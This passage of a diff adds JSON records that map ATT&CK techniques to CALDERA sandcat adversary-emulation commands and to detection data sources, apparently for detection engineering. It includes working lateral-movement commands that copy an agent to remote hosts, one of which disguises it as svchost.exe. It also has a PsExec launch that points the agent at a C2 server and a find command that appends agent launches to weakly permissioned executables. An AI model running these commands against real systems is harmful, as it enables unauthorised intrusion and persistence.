"data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or 
Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1570", + "command_list": [ + "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n", + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n", + "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start 
C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n" + ], + "commands": [ + { + "command": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "source": "data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml", + "name": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP" + }, + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n", + "source": "data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml", + "name": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP" + }, + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n", + "source": "data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml", + "name": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP" + }, + { + "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n", + "source": "data/abilities/lateral-movement/620b674a-7655-436c-b645-bc3e8ea51abd.yml", + "name": "Copy Sandcat file using PsExec on CMD" + } + ], + 
"parsed_datasets": [ + { + "id": "4908fdc4-74fc-4d7c-8935-26d11ad26a8d", + "name": "Copy 54ndc47 (WinRM and SCP)", + "description": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1570", + "name": "Lateral Tool Transfer" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "cleanup": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n Invoke-Command -Session $session -Command {Remove-Item \"C:\\Users\\Public\\svchost.exe\" -force};\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "payloads": [ + "sandcat.go-windows" + ] + } + }, + "darwin": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n", + "cleanup": "ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f 
sandcat.go'\n", + "payloads": [ + "sandcat.go-darwin" + ] + } + }, + "linux": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n", + "cleanup": "ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'\n", + "payloads": [ + "sandcat.go-linux" + ] + } + } + }, + "singleton": true + }, + { + "id": "620b674a-7655-436c-b645-bc3e8ea51abd", + "description": "Copy Sandcat file using PsExec on CMD", + "name": "Copy Sandcat File using PsExec on CMD", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1570", + "name": "Lateral Tool Transfer" + }, + "platforms": { + "windows": { + "cmd": { + "cleanup": "del /f sandcat.go-windows && del /f \\\\#{remote.host.name}\\Users\\Public\\sandcat.go-windows.exe", + "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n", + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was 
created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1574.010", + "command_list": [ + "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n" + ], + "commands": [ + { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "source": "data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml", + "name": "Locate and infect files with weak 
but executable perms" + }, + { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "source": "data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml", + "name": "Locate and infect files with weak but executable perms" + } + ], + "parsed_datasets": [ + { + "id": "10681f2f-be03-44af-858d-f2b0812df185", + "name": "Weak executable files", + "description": "Locate and infect files with weak but executable perms", + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1574.010", + "name": "Hijack Execution Flow: Services File Permissions Weakness" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "payloads": [ + "sandcat.go" + ] + } + }, + "linux": { + "sh": { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + 